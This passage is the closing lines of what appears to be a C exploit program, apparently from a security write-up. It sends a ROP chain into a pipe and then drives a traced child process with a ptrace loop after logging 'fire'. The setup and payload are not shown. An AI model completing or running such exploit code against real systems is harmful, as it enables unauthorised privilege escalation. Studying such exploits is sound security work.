write(sync_pipe[0][1], rop, sizeof(rop));

logd("fire ...");
while (1) {
if (ptrace(PTRACE_CONT, child, NULL, NULL) < 0) {
die("failed to PTRACE_CONT: %m");
}
waitpid(child, NULL, __WALL);
}

while (1) {
sleep(100);
}

return 0;
}

参考